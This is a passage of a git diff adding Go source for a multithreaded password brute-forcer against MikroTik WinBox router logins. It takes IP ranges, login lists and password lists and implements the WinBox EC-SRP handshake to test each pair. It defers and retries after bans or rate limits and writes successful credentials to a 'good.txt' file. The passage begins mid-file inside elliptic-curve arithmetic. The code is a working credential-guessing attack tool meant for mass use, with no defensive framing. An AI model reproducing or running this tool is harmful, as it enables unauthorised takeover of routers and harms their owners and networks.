self._Add(x3, y3, z3, x2, y2.Neg(), NewBigint(1), p) + } else if nf[i].GtInt(0) { + x3, y3, z3 = self._Add(x3, y3, z3, x2, y2, NewBigint(1), p) + } + } + + if y3.Empty() || z3.Empty() { + return NewInfJacobiPoint() + } + + return NewJacobiPoint(self.curve, x3, y3, z3, self.order) +} + +func (self *JacobiPoint) MulAdd(selfMul bigint, other *JacobiPoint, otherMul bigint) *JacobiPoint { + return self.Mul(selfMul).Add(other.Mul(otherMul)) +} diff --git a/results.go b/results.go new file mode 100644 index 0000000..4dc4bf0 --- /dev/null +++ b/results.go @@ -0,0 +1,46 @@ +package main + +import ( + "fmt" + "os" +) + +var outFile *os.File + +func RegisterResult(t *Task, good bool) { + if good { + log("res", 0, "****************\n******** OK: %v %v %v\n****************", t.e.String(), t.login, t.password) + if outFile != nil { + fmt.Fprintf(outFile, "%v\t%v\t%v\n", t.e.String(), t.login, t.password) + } + } else { + log("res", 1, "bad: %v %v %v", t.e.String(), t.login, t.password) + } +} + +func OpenOutFile() { + fileName := CfgGetString("out-file") + if fileName == "" { + log("out", 0, "WARNING: out-file is not specified, results will only be logged in console") + outFile = nil + } else { + var err error + outFile, err = os.OpenFile(fileName, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + + if err != nil { + fail("error opening output file \"%v\": %v", fileName, err.Error()) + } + + log("out", 2, "opened output file \"%v\"", fileName) + } +} + +func CloseOutFile() { + outFile.Close() + outFile = nil +} + +func init() { + CfgRegister("out-file", "good.txt", "results will be saved in this file") + CfgRegisterAlias("o", "out-file") +} diff --git a/service.go b/service.go new file mode 100644 index 0000000..c52a0ce --- /dev/null +++ b/service.go @@ -0,0 +1,29 @@ +package main + +import ( + "errors" + "net" +) + +// TODO: multiple services... + +func TryLogin(task *Task, conn net.Conn) (res bool, err error) { + defer func() { + if r := recover(); r != nil { + log("srv", 1, "fatal error (panic) in service handler: %v", r) + res = false + + switch x := r.(type) { + case string: + err = errors.New(x) + case error: + err = x + default: + err = errors.New("unknown error") + } + } + }() + + res, err = NewWinbox(task, conn).TryLogin() + return res, err +} diff --git a/source.go b/source.go new file mode 100644 index 0000000..9adec5d --- /dev/null +++ b/source.go @@ -0,0 +1,288 @@ +package main + +import ( + "bufio" + "os" + "strconv" + "strings" + "sync" +) + +type Source struct { + name, plainParmName, filesParmName string + + validator func(item string) (string, error) + + plain []string + files []*os.File + fileNames []string + + contents []string + + fetchMutex sync.Mutex +} + +// both -1: exhausted +// both 0: not started yet +type SourcePos struct { + plainIdx int + contentIdx int +} + +func (pos *SourcePos) String() string { + return "P" + strconv.Itoa(pos.plainIdx) + "/C" + strconv.Itoa(pos.contentIdx) +} + +func (pos *SourcePos) Exhausted() bool { + return pos.plainIdx == -1 && pos.contentIdx == -1 +} + +func ipValidator(item string) (res string, err error) { + return item, nil +} + +func passwordValidator(item string) (res string, err error) { + if CfgGetSwitch("no-password-trim") { + return item, nil + } else { + return strings.TrimSpace(item), nil + } +} + +var SrcIP Source = Source{name: "ip", plainParmName: "ip", filesParmName: "ip-file"} +var SrcLogin Source = Source{name: "login", plainParmName: "login", filesParmName: "login-file"} +var SrcPassword Source = Source{name: "password", plainParmName: "password", + filesParmName: "password-file", validator: passwordValidator} + +func (src *Source) validate(item string) (res string, err error) { + if src.validator != nil { + res, err := src.validator(item) + if err != nil { + log("src", 1, "error validating %v \"%v\": %v", src.name, item, err.Error()) + } + return res, err + } else { + return item, nil + } +} + +func (src *Source) parsePlain() { + if src.plain == nil { + src.plain = []string{} + } + + for _, plain := range CfgGetStringSlice(src.plainParmName) { + var err error + plain, err = src.validate(plain) + if err != nil { + continue + } + + src.plain = append(src.plain, plain) + } + + if len(src.plain) > 0 { + log("src", 1, "parsed %v %v items", len(src.plain), src.name) + } +} + +func (src *Source) openFiles() { + if src.files == nil { + src.files = []*os.File{} + } + + if src.fileNames == nil { + src.fileNames = []string{} + } + + fileNames := CfgGetStringSlice(src.filesParmName) + for _, fileName := range fileNames { + f, err := os.Open(fileName) + if err != nil { + fail("error opening source file \"%v\": %v", fileName, err.Error()) + } + + src.files = append(src.files, f) + src.fileNames = append(src.fileNames, fileName) + } + + if len(src.files) > 0 { + log("src", 1, "opened %v %v files", len(src.files), src.name) + } +} + +// this parses all source files +func (src *Source) parseFiles() { + if src.contents == nil { + src.contents = []string{} + } + + for i, file := range src.files { + fileName := src.fileNames[i] + log("src", 1, "parsing %v", fileName) + thisTotal := 0 + + scanner := bufio.NewScanner(file) + for scanner.Scan() { + text := scanner.Text() + if text == "" { + continue + } + + value, err := src.validate(text) + if err != nil { + continue + } + + src.contents = append(src.contents, value) + thisTotal++ + } + + scannerErr := scanner.Err() + failIf(scannerErr != nil, "error reading source file \"%v\": %v", fileName, scannerErr) + log("src", 1, "ok: parsed %v, got %v contents, %v total", fileName, thisTotal, len(src.contents)) + } +} + +func (src *Source) failIfEmpty() { + failIf(len(src.contents)+len(src.plain) == 0, "no %vs defined: check %v and %v parameters", src.name, src.plainParmName, src.filesParmName) +} + +func (src *Source) reportLoaded() { + log("src", 0, "loaded %vs: %v items from commandline and %v items from files", src.name, len(src.plain), len(src.contents)) +} + +func (src *Source) load(wg *sync.WaitGroup) { + if wg != nil { + defer wg.Done() + } + + if src.name == "password" && CfgGetSwitch("add-empty-password") { + if src.plain == nil { + src.plain = []string{} + } + src.plain = append(src.plain, "") + } + + src.parsePlain() + src.openFiles() + defer src.closeFiles() + + src.parseFiles() + src.failIfEmpty() +} + +func (src *Source) closeFiles() { + l := len(src.files) + for _, file := range src.files { + if file != nil { + file.Close() + } + } + + src.files = []*os.File{} + src.fileNames = []string{} + log("src", 1, "closed all %v %v files", l, src.name) +} + +func (src *Source) fetchFromSlice(name string, idx *int, slice []string, inc bool) (res string, empty bool) { + if *idx == -1 { + // exhausted + log("src", 3, "fetch %v from %v: idx is -1, return empty", src.name, name) + return "", true + } + + if *idx >= len(slice) { + log("src", 3, "fetch %v from %v: idx >= slice length (%v >= %v), marking as exhausted, return empty", src.name, name, *idx, len(slice)) + *idx = -1 + return "", true + } + + res = slice[*idx] + log("src", 3, "fetch %v from %v: ok, got %v at idx %v", src.name, name, res, *idx) + + if inc { + *idx = *idx + 1 + log("src", 3, "fetch %v from %v: incrementing idx to %v", src.name, name, *idx) + } + + return res, false +} + +// retrieves an item from source +// increments pos +func (src *Source) FetchOne(pos *SourcePos, inc bool) (res string, empty bool) { + src.fetchMutex.Lock() + defer src.fetchMutex.Unlock() + + if CfgGetSwitch("file-contents-first") { + res, empty = src.fetchFromSlice("contents", &pos.contentIdx, src.contents, inc) + if empty { + res, empty = src.fetchFromSlice("plain", &pos.plainIdx, src.plain, inc) + } + } else { + res, empty = src.fetchFromSlice("plain", &pos.plainIdx, src.plain, inc) + if empty { + res, empty = src.fetchFromSlice("contents", &pos.contentIdx, src.contents, inc) + } + } + + logIf(empty, "src", 2, "exhausted source %v for pos %v", src.name, pos.String()) + return res, empty +} + +func (pos *SourcePos) Reset() { + pos.plainIdx = 0 + pos.contentIdx = 0 + log("src", 3, "resetting source pos") +} + +func LoadSources() { + log("src", 1, "loading sources") + + var wg sync.WaitGroup + wg.Add(3) + go SrcIP.load(&wg) + go SrcLogin.load(&wg) + go SrcPassword.load(&wg) + wg.Wait() + + SrcIP.reportLoaded() + SrcLogin.reportLoaded() + SrcPassword.reportLoaded() + + ParseEndpoints(SrcIP.plain) + + // TODO: dynamic loading of contents + // currently this just dumps everything to a slice + ParseEndpoints(SrcIP.contents) + + log("src", 1, "ok: finished loading sources") +} + +func CloseSources() { + log("src", 1, "closing sources") + SrcIP.closeFiles() + SrcLogin.closeFiles() + SrcPassword.closeFiles() + log("src", 1, "ok: finished closing sources") +} + +func init() { + CfgRegister("ip", []string{}, "IPs or subnets in CIDR notation") + CfgRegister("ip-file", []string{}, "paths to files with IPs or subnets in CIDR notation (one entry per line)") + CfgRegister("login", []string{}, "one or more logins") + CfgRegister("login-file", []string{}, "paths to files with logins (one entry per line)") + CfgRegister("password", []string{}, "one or more passwords") + CfgRegister("password-file", []string{}, "paths to files with passwords (one entry per line)") + + CfgRegisterSwitch("add-empty-password", "insert an empty password to the password list") + //CfgRegisterSwitch("no-source-validation", "do not attempt to validate and count lines in source files") + CfgRegisterSwitch("no-password-trim", "preserve leading and trailing spaces in passwords") + CfgRegisterSwitch("logins-first", "increment logins before passwords") + CfgRegisterSwitch("file-contents-first", "try to go through source files first, defer commandline args for later") + + // + //CfgRegisterSwitch("ignore-network-names", "always skip non-IPv4/non-IPv6 entries, do not attempt to resolve them as domain names") + // +} diff --git a/task.go b/task.go new file mode 100644 index 0000000..747f298 --- /dev/null +++ b/task.go @@ -0,0 +1,285 @@ +package main + +import ( + rbt "github.com/emirpasic/gods/trees/redblacktree" + rbtUtils "github.com/emirpasic/gods/utils" + "net" + "sync" + "time" +) + +// TaskEvent represents all events that can be issued on a Task. +type TaskEvent int + +const ( + TE_Generic TaskEvent = iota // undefined or no event + + // These should terminate a task instantly. + TE_NoResponse // connect timed out + TE_ReadFailed // read failed or timed out + TE_NoService // endpoint does not provide selected service + TE_ProtocolError // a service module reported an error during auth attempt + TE_Bad // auth attempt completed successfully but credentials were wrong + TE_Good // auth attempt completed successfully and the credentials are correct + + // TODO: proxying + TE_ProxyNoResponse // cannot connect to a proxy + TE_ProxyError // proxy failed during an exchange with the endpoint + TE_ProxyInvalidAuth // authenticated proxy rejected our credentials + + // These serve as "hints" - they do not necessarily need to + // terminate a task, but they can still provide useful + // information about an endpoint or a service. + TH_NoSuchLogin // login in this task is not present or not valid on a service + TH_LoadExceeded // endpoint or service cannot handle this attempt rate + TH_Banned // got banned from a service, should try another proxy or wait out the delay + TH_WaitRequest // request for a grace time + + // These are still hints, but they occur very frequently on a Task's normal lifecycle, + // effectively making these sort of "notifications" rather than hints. + TN_Connected // successfully connected to an endpoint + TN_ProxyConnected // successfully connected to a proxy +) + +func (ev TaskEvent) String() string { + return [...]string{"Generic", "No response", "Read failed", "No Service", "Protocol error", + "Bad", "Good", "No response from Proxy", "Error from Proxy", "Invalid auth from Proxy", + "No Such login (hint)", "Load exceeded (hint)", "Banned (hint)", "Wait request (hint)", + "Connected (notify)", "Connected from Proxy (notify)"}[ev] +} + +// A Task represents a single unit of workload. +// Every Task is linked to an Endpoint. +type Task struct { + e *Endpoint + login, password string + deferUntil time.Time + numDeferrals int + + // this should not be in Task struct! + conn net.Conn + // ??? do we even need this here + good bool +} + +// maxSafeThreads is a safeguard to prevent creation of too many threads at once. +const maxSafeThreads = 5000 + +// deferredTasks is a list of tasks that were deferred for processing to a later time. +// This usually happens due to connection errors, protocol errors or per-endpoint limits. +var deferredTasks *rbt.Tree + +// taskMutex is a mutex for safe handling of RB tree. +var taskMutex sync.Mutex + +// String returns a string representation of a Task. +func (task *Task) String() string { + if task == nil { + return "" + } else { + return task.e.String() + "@" + task.login + ":" + task.password + } +} + +// Defer sends a Task to the deferred queue. +func (task *Task) Defer(addTime time.Duration) { + task.deferUntil = time.Now().Add(addTime) + task.numDeferrals++ + + // tell the endpoint that we got deferred, + // so it won't be selected until the deferral time has passed + // task.e.SetDeferralTime(task.deferUntil) + // FIXME: this isn't needed, endpoints can handle their own delays + + maxDeferrals := CfgGetInt("task-max-deferrals") + if maxDeferrals != -1 && task.numDeferrals >= maxDeferrals { + log("task", 5, "giving up on task \"%v\" because it has exhausted its deferral limit (%v)", task, maxDeferrals) + return + } + + log("task", 5, "deferring task \"%v\" for %v", task, addTime) + + taskMutex.Lock() + defer taskMutex.Unlock() + + deferredTasks.Put(task.deferUntil, task) +} + +// EventWithParm tells a Task (and its underlying Endpoint) that +// something important has happened, or a hint has been acquired. +// Returns False if an event resulted in a deletion of its Task. +func (task *Task) EventWithParm(event TaskEvent, parm any) bool { + log("task", 4, "task event for \"%v\": %v", task, event) + + if event == TE_Generic { + return true // do not process generic events + } + + res := task.e.EventWithParm(event, parm) // notify the endpoint first + + switch event { + // on these events, defer a Task only if its Endpoint is being kept + case TE_NoResponse: + if res { + task.Defer(CfgGetDurationMS("no-response-delay-ms")) + } + case TE_ReadFailed: + if res { + task.Defer(CfgGetDurationMS("read-error-delay-ms")) + } + case TE_ProtocolError: + if res { + task.Defer(CfgGetDurationMS("protocol-error-delay-ms")) + } + + // report about a bad/good auth result + case TE_Good: + RegisterResult(task, true) + case TE_Bad: + RegisterResult(task, false) + + // wait request has occurred: stop processing and instantly wait on a thread + case TH_WaitRequest: + log("task", 4, "wait request for \"%v\": sleeping for %v", task, parm.(time.Duration)) + time.Sleep(parm.(time.Duration)) + } + + return res +} + +// Event is a parameterless version of EventWithParm. +func (task *Task) Event(event TaskEvent) bool { + return task.EventWithParm(event, 0) +} + +// GetDeferredTask retrieves a Task from the deferred queue. +func GetDeferredTask() (task *Task, waitTime time.Duration) { + currentTime := time.Now() + + if deferredTasks.Empty() { + log("task", 5, "deferred task list is empty") + return nil, 0 + } + + // check if a deferred task's endpoint is OK to fetch - + // sometimes, a task is OK to fetch but the endpoint was delayed by something else + + it := deferredTasks.IteratorAt(deferredTasks.Left()) + for { + k, v := it.Key().(time.Time), it.Value().(*Task) + + if k.After(currentTime) { + log("task", 5, "deferred tasks cannot yet be processed at this time") + return nil, k.Sub(currentTime) + } + + if k.Before(v.deferUntil) { + log("task", 5, "deferred task was re-deferred: removing its previous definition") + defer deferredTasks.Remove(k) + it.Next() + continue + } + + if !v.e.delayUntil.IsZero() && v.e.delayUntil.After(currentTime) { + // skip this task: deferred task is OK, but its endpoint is delayed + it.Next() + continue + } + + defer deferredTasks.Remove(k) + return v, 0 + } + + log("task", 5, "deferred tasks are OK for processing but their endpoints cannot yet be processed at this time") + return nil, 0 +} + +// FetchTaskComponents returns all components needed to build a Task. +func FetchTaskComponents() (ep *Endpoint, login string, password string, waitTime time.Duration) { + var empty bool + + log("task", 5, "fetching new endpoint") + ep, waitTime = FetchEndpoint() + if ep == nil { + return nil, "", "", waitTime + } + + log("task", 5, "fetched endpoint: \"%v\"", ep) + + for { + log("task", 5, "fetching password for \"%v\"", ep) + password, empty = SrcPassword.FetchOne(&ep.passwordPos, true) + if !empty { + break + } + + log("task", 5, "out of passwords for \"%v\": resetting and fetching new login", ep) + ep.passwordPos.Reset() + login, empty = SrcLogin.FetchOne(&ep.loginPos, true) + } + + log("task", 5, "got password for \"%v\": %v, fetching login", ep, password) + login, empty = SrcLogin.FetchOne(&ep.loginPos, false) + + if !empty { + log("task", 5, "got login for \"%v\": %v", ep, login) + return ep, login, password, 0 + } else { + log("task", 5, "out of logins for \"%v\": exhausting endpoint", ep) + ep.Exhausted() + return FetchTaskComponents() // attempt to fetch again + } +} + +// CreateTask creates a new Task element. It searches through deferred queue first, +// then, if nothing was found, it assembles a new (Endpoint, login, password) combination. +func CreateTask() (task *Task, delay time.Duration) { + taskMutex.Lock() + defer taskMutex.Unlock() + + task, delayDeferred := GetDeferredTask() + if task != nil { + log("task", 4, "new task (deferred): %v", task) + task.conn = nil + task.good = false + return task, 0 + } + + ep, login, password, delaySource := FetchTaskComponents() + if ep == nil { + if delayDeferred == 0 && delaySource == 0 { + log("task", 4, "cannot build task, no endpoint") + return nil, 0 + } else if delayDeferred > delaySource || delayDeferred == 0 { + log("task", 4, "delaying task creation (by source delay) for %v", delaySource) + return nil, delaySource + } else { + log("task", 4, "delaying task creation (by deferred delay) for %v", delayDeferred) + return nil, delayDeferred + } + } + + t := Task{} + t.e = ep + t.login = login + t.password = password + t.good = false + + log("task", 4, "new task: %v", &t) + + return &t, 0 +} + +func init() { + deferredTasks = rbt.NewWith(rbtUtils.TimeComparator) + + CfgRegister("threads", 3, "how many threads to use") + CfgRegister("thread-delay-ms", 10, "separate threads at startup for this amount of ms") + CfgRegister("connect-timeout-ms", 3000, "") + CfgRegister("read-timeout-ms", 2000, "") + + // using a very high limit for now, but this should actually be set to -1 + CfgRegister("task-max-deferrals", 30000, "how many deferrals are allowed for a single task. -1 to disable") + + CfgRegisterAlias("t", "threads") +} diff --git a/thread.go b/thread.go new file mode 100644 index 0000000..f113efa --- /dev/null +++ b/thread.go @@ -0,0 +1,112 @@ +package main + +import ( + "net" + "sync" + "time" +) + +// threadWork processes a single work item for a thread. +func threadWork(dialer *net.Dialer) bool { + readTimeout := CfgGetDurationMS("read-timeout-ms") + + task, delay := CreateTask() + if task == nil { + if delay > 0 { + log("thread", 3, "no endpoints available, sleeping for %v", delay) + time.Sleep(delay) + return true + } else { + log("thread", 3, "no endpoints available, stopping thread loop") + return false + } + } + + conn, err := dialer.Dial("tcp", task.e.String()) + if err != nil { + task.Event(TE_NoResponse) + log("thread", 2, "cannot connect to \"%v\": %v", task.e, err.Error()) + return true + } + defer conn.Close() + + task.conn = conn + task.Event(TN_Connected) + + conn.SetReadDeadline(time.Now().Add(readTimeout)) // should be just before Send() call... + + log("thread", 2, "trying %v:%v on \"%v\"", task.login, task.password, task.e) + + // TODO: multiple services (currently just WinBox) + res, err := TryLogin(task, conn) + if err != nil { + task.Event(TE_ProtocolError) + } else { + if res && err == nil { + task.EventWithParm(TE_Good, task.login) + } else { + task.EventWithParm(TE_Bad, task.login) + } + } + + return true +} + +// threadLoop calls threadWork in a loop, until the endpoints are exhausted, +// a pause/stop signal has been raised, or an exception has occurred in threadWork. +func threadLoop(dialer *net.Dialer) { + for threadWork(dialer) { + // TODO: pause/stop signal + // TODO: exception handling + } +} + +// threadEntryPoint is the main entrypoint for a work thread. +func threadEntryPoint(c chan bool, threadIdx int, wg *sync.WaitGroup) { + <-c + + log("thread", 3, "starting loop for thread %v", threadIdx) + + connectTimeout := time.Duration(CfgGetInt("connect-timeout-ms")) * time.Millisecond + dialer := net.Dialer{Timeout: connectTimeout, KeepAlive: -1} + + threadLoop(&dialer) + + log("thread", 3, "exiting thread %v", threadIdx) + wg.Done() +} + +// InitializeThreads creates and starts up all threads. +func InitializeThreads() *sync.WaitGroup { + numThreads := CfgGetInt("threads") + failIf(numThreads > maxSafeThreads, "too many threads (max %v)", maxSafeThreads) + + log("thread", 0, "initializing %v threads", numThreads) + + c := make(chan bool) + var wg sync.WaitGroup + for i := 1; i <= numThreads; i++ { + wg.Add(1) + go threadEntryPoint(c, i, &wg) + } + + threadDelay := CfgGetDurationMS("thread-delay-ms") + log("thread", 0, "starting %v threads", numThreads) + for i := 1; i <= numThreads; i++ { + c <- true + if threadDelay > 0 { + time.Sleep(threadDelay) + } + } + + log("thread", 0, "started") + return &wg +} + +// WaitForThreads enters a wait state and keeps it until +// all threads have exited. +func WaitForThreads(wg *sync.WaitGroup) { + log("thread", 1, "waiting for threads") + wg.Wait() + log("thread", 1, "finished waiting for threads") +} diff --git a/winbox.go b/winbox.go new file mode 100644 index 0000000..dc1d430 --- /dev/null +++ b/winbox.go @@ -0,0 +1,193 @@ +package main + +import ( + "bytes" + "errors" + "net" +) + +type Winbox struct { + task *Task + conn net.Conn + stage int + + user, pass string + w *WCurve + sa, xwa, xwb, j, z, secret, clientCC, serverCC, i, msg, resp []byte + xwaParity, xwbParity bool +} + +func NewWinbox(task *Task, conn net.Conn) *Winbox { + winbox := Winbox{} + winbox.task = task + winbox.conn = conn + winbox.xwaParity = false + winbox.xwbParity = false + winbox.w = NewWCurve() + winbox.stage = -1 + winbox.user = task.login + winbox.pass = task.password + return &winbox +} + +func (winbox *Winbox) genSharedSecret(salt []byte) error { + winbox.i = genPasswordValidatorPriv(winbox.user, winbox.pass, salt) + xGamma, _ := winbox.w.genPublicKey(winbox.i) + v := winbox.w.redp1(xGamma, true) + + wb := winbox.w.liftX(NewBigintFromBytes(winbox.xwb), winbox.xwbParity) + if wb == nil { + winbox.stage = -1 + return errors.New("liftX failed") + } + + wb = wb.Add(v) + + xwaCombined := append(winbox.xwa, winbox.xwb...) + winbox.j = getSHA2Digest(xwaCombined) + pt := NewBigintFromBytes(winbox.i).Mul(NewBigintFromBytes(winbox.j)) + pt = pt.Add(NewBigintFromBytes(winbox.sa)) + pt = winbox.w.finiteFieldValue(pt) + + mp := wb.Mul(pt) + + winbox.z, _ = winbox.w.toMontgomery(mp) + winbox.secret = getSHA2Digest(winbox.z) + + return nil +} + +func (winbox *Winbox) publicKeyExchange() { + winbox.sa, _ = genRandomBytes(32) + winbox.xwa, winbox.xwaParity = winbox.w.genPublicKey(winbox.sa) + + lx := winbox.w.liftX(NewBigintFromBytes(winbox.xwa), winbox.xwaParity) + if lx == nil { + log("winbox", 1, "liftX failed in PKE") + winbox.stage = -1 + return + } + + if !winbox.w.check(lx) { + log("winbox", 1, "curve check failed") + winbox.stage = -1 + return + } + + winbox.msg = append([]byte(winbox.user), byte(0)) + winbox.msg = append(winbox.msg, winbox.xwa...) + if winbox.xwaParity { + winbox.msg = append(winbox.msg, byte(1)) + } else { + winbox.msg = append(winbox.msg, byte(0)) + } + + header := append([]byte{byte(len(winbox.msg))}, byte(6)) + winbox.msg = append(header, winbox.msg...) + winbox.stage = 1 +} + +func (winbox *Winbox) confirmation() error { + if len(winbox.resp) <= 2 { + log("winbox", 1, "response size must be greater than 2 (got %v)", len(winbox.resp)) + winbox.stage = -1 + return errors.New("invalid response size") + } + + respLen := winbox.resp[0] + winbox.resp = winbox.resp[2:] + if len(winbox.resp) != int(respLen) { + log("winbox", 1, "invalid challenge response size: got %v, expected %v", len(winbox.resp), respLen) + winbox.stage = -1 + return errors.New("invalid challenge response size") + } + + winbox.xwb = winbox.resp[:32] + if winbox.resp[32] == 0 { + winbox.xwbParity = false + } else { + winbox.xwbParity = true + } + + salt := winbox.resp[33:] + if len(salt) != 16 { + // this means that there is no such login, + // or that its an old routeros version + log("winbox", 1, "invalid salt size: got %v, expected 16", len(salt)) + + // report this finding to endpoint manager + winbox.task.EventWithParm(TH_NoSuchLogin, winbox.user) + + winbox.stage = -1 + return nil // this is not a fatal error for an endpoint + } + + err := winbox.genSharedSecret(salt) + if err != nil { + return err + } + + winbox.j = getSHA2Digest(append(winbox.xwa, winbox.xwb...)) + winbox.clientCC = getSHA2Digest(append(winbox.j, winbox.z...)) + + header := append([]byte{byte(len(winbox.clientCC))}, byte(6)) + winbox.msg = append(header, winbox.clientCC...) + winbox.stage = 2 + return nil +} + +func (winbox *Winbox) sendAndRecv() error { + if len(winbox.msg) > 0 && winbox.conn != nil { + _, err := winbox.conn.Write(winbox.msg) + winbox.msg = []byte{} + + if err != nil { + log("winbox", 1, "failed to send: %v", err.Error()) + return err + } + + winbox.resp = make([]byte, 1024) + n, err := winbox.conn.Read(winbox.resp) + if err != nil { + log("winbox", 1, "failed to recv: %v", err.Error()) + return err + } + + winbox.resp = winbox.resp[:n] + } + + return nil +} + +func (winbox *Winbox) TryLogin() (result bool, err error) { + log("winbox", 2, "login: stage 1, PKE") + winbox.publicKeyExchange() + + log("winbox", 2, "login: stage 1, PKE OK, sending") + err = winbox.sendAndRecv() + if err != nil { + return false, err + } + + log("winbox", 2, "login: stage 2, confirmation") + err = winbox.confirmation() + if err != nil { + return false, err + } + + if winbox.stage == -1 { // confirmation failed but no error? + return false, nil // report that its a bad login + } + + log("winbox", 2, "login: stage 2, confirmation OK, sending") + err = winbox.sendAndRecv() + if err != nil { + return false, err + } + + log("winbox", 2, "login: stage 3") + a1 := append(winbox.j, winbox.clientCC...) + winbox.serverCC = getSHA2Digest(append(a1, winbox.z...)) + + return bytes.Equal(winbox.resp[2:], winbox.serverCC), nil +}